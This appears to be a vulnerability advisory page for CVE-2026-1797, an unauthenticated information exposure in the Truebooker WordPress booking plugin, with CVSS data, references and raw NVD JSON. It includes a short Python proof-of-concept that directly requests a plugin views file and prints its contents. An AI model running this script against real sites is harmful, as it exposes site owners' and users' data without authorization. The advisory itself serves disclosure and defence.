CVE-2026-1797

Description

The Appointment Booking and Scheduler Plugin – Truebooker plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 through views php files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed views php files via direct access.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Appointment Booking and Scheduler Plugin – Truebooker <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target vulnerable URL path
# Replace 'example.com' with the actual target domain
target_url = "http://example.com/wp-content/plugins/truebooker-appointment-booking/main/views/truebooker-user.php"

try:
    # Send a GET request without authentication
    response = requests.get(target_url, timeout=10)

    # Check if the request was successful (HTTP 200)
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Sensitive information exposed:")
        print(response.text[:500]) # Print first 500 characters to demonstrate exposure
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1797
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1797
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1797/
[4] VulDB https://vuldb.com/cve/CVE-2026-1797
[5] https://plugins.trac.wordpress.org/browser/truebooker-appointment-booking/tags/1.1.2/main/views/truebooker-user.php
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/4ebe8b63-ea43-4e39-9fdf-e28fb4638433?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1797", "sourceIdentifier": "[email protected]", "published": "2026-03-31T05:16:10.867", "lastModified": "2026-04-24T18:11:16.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking and Scheduler Plugin – Truebooker plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 through views php files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed views php files via direct access."}, {"lang": "es", "value": "El plugin Appointment Booking and Scheduler Plugin – Truebooker para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 1.1.4, inclusive, a través de los archivos PHP de vistas. Esto permite a atacantes no autenticados ver información potencialmente sensible contenida en los archivos PHP de vistas expuestos mediante acceso directo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/truebooker-appointment-booking/tags/1.1.2/main/views/truebooker-user.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ebe8b63-ea43-4e39-9fdf-e28fb4638433?source=cve", "source": "[email protected]"}]}}